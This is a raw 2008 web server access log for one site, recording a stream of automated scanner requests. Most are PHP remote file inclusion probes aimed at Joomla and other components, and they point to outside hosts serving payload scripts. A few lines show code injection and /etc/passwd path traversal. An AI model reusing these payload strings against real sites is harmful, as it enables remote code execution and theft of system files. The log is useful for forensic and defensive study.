82.192.68.59 - - [06/May/2008:11:34:20 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:11:34:20 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:11:34:21 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:35:20 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:35:26 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:35:30 -0700] "GET /logs/access_080228.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:11:36:04 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:11:36:04 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.142.220.82 - - [06/May/2008:11:36:07 -0700] "GET /logs/access_071218.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:11:36:09 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:11:36:10 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:36:36 -0700] "GET //display.php?page=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
79.16.32.9 - - [06/May/2008:11:36:55 -0700] "GET /logs/access_080201.loghttp://scienceproject.eclub.lv/homework? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:11:37:07 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.253.26.93 - - [06/May/2008:11:37:07 -0700] "GET /logs/access_080201.loghttp://scienceproject.eclub.lv/homework? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts-MyWay; (R1 1.3); .NET CLR 1.1.4322)" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:11:37:08 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:37:36 -0700] "GET /logs/access_080131.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:38:00 -0700] "GET /logs/access_080113.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.30.195.218 - - [06/May/2008:11:38:34 -0700] "GET /logs/access_071219.log HTTP/1.1" 200 181961 "-" "dcxauqwnlgriqdphwdvgfaupneg xjr" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:38:40 -0700] "GET /logs/access_080114.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.135 - - [06/May/2008:11:38:44 -0700] "GET /logs/access_080218.log//zb40/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.135 - - [06/May/2008:11:38:44 -0700] "GET //zb40/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.135 - - [06/May/2008:11:38:44 -0700] "GET /logs//zb40/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:38:55 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:39:10 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:39:10 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:39:11 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:39:16 -0700] "GET /logs/access_080219.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:39:18 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:39:19 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:39:19 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.142.220.82 - - [06/May/2008:11:39:24 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.137.18 - - [06/May/2008:11:39:25 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.137.18 - - [06/May/2008:11:39:25 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.142.220.82 - - [06/May/2008:11:39:29 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.137.18 - - [06/May/2008:11:39:30 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:39:37 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:39:37 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:39:38 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:39:41 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:39:51 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:39:51 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:39:52 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:39:55 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
210.203.73.105 - - [06/May/2008:11:40:11 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:40:14 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:40:15 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:40:35 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:40:36 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:40:37 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:40:43 -0700] "GET /logs/access_080113.log/content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:40:43 -0700] "GET /content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:40:43 -0700] "GET /logs/content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.21.85.101 - - [06/May/2008:11:40:59 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:40:59 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:41:00 -0700] "GET /logs/access_080113.log/content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:41:00 -0700] "GET /content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:41:00 -0700] "GET /logs/content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.200.95.142 - - [06/May/2008:11:41:00 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [06/May/2008:11:41:02 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [06/May/2008:11:41:03 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:41:14 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:41:15 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:41:35 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:41:35 -0700] "GET //modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:41:35 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:41:38 -0700] "GET /logs/access_080106.log/content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
72.232.211.138 - - [06/May/2008:11:41:38 -0700] "GET /content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
72.232.211.138 - - [06/May/2008:11:41:38 -0700] "GET /logs/content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
62.121.128.18 - - [06/May/2008:11:41:41 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:41:48 -0700] "GET /logs/access_080106.log/content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
72.232.211.138 - - [06/May/2008:11:41:48 -0700] "GET /content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
203.200.95.142 - - [06/May/2008:11:41:48 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:41:48 -0700] "GET /logs/content.php?page=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
203.200.95.142 - - [06/May/2008:11:41:49 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:42:09 -0700] "GET /logs/access_080312.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:11:42:21 -0700] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:42:26 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:11:42:33 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.121.128.18 - - [06/May/2008:11:42:41 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [06/May/2008:11:42:42 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [06/May/2008:11:42:42 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:42:46 -0700] "GET /logs/access_080131.log/index.php?pag=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:42:50 -0700] "GET /index.php?pag=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:42:50 -0700] "GET /logs/index.php?pag=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.192 - - [06/May/2008:11:42:56 -0700] "GET /logs/access_080313.log/calendar.php?s=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [06/May/2008:11:42:56 -0700] "GET /calendar.php?s=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [06/May/2008:11:42:57 -0700] "GET /logs/calendar.php?s=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:43:02 -0700] "GET /logs/access_080130.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.21.85.101 - - [06/May/2008:11:43:02 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [06/May/2008:11:43:05 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [06/May/2008:11:43:05 -0700] "GET //include.php?path[docroot]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [06/May/2008:11:43:05 -0700] "GET /logs//include.php?path[docroot]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.35.191.113 - - [06/May/2008:11:43:23 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:43:25 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.35.191.113 - - [06/May/2008:11:43:30 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:43:39 -0700] "GET /logs/access_080128.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:43:43 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:43:44 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:43:45 -0700] "GET /logs/access_080211.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.135 - - [06/May/2008:11:44:20 -0700] "GET //zb40/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:44:24 -0700] "GET /logs/index.php?pagina=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:44:24 -0700] "GET /logs/access_080121.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:44:28 -0700] "GET /index.php?pagina=/../../../../../../../../etc/passwd HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:44:29 -0700] "GET /logs/access_080120.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:44:31 -0700] "GET /logs/access_080218.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.207.204.13 - - [06/May/2008:11:44:34 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:11:44:58 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:11:44:58 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:11:45:14 -0700] "GET /logs/access_080211.log/!scanhttp://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:11:45:15 -0700] "GET /!scanhttp://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:11:45:15 -0700] "GET /logs/!scanhttp://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:45:16 -0700] "GET /logs/access_080205.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:11:45:17 -0700] "GET /logs/access_080228.log/!scanhttp://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:45:32 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 200 50 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:45:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:11:45:49 -0700] "GET /logs/access_080211.log/!scanhttp://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:11:45:49 -0700] "GET /!scanhttp://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:11:45:50 -0700] "GET /logs/!scanhttp://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:45:50 -0700] "GET /logs/access_080308.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:45:50 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:11:45:54 -0700] "GET /logs/access_080228.log/!scanhttp://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
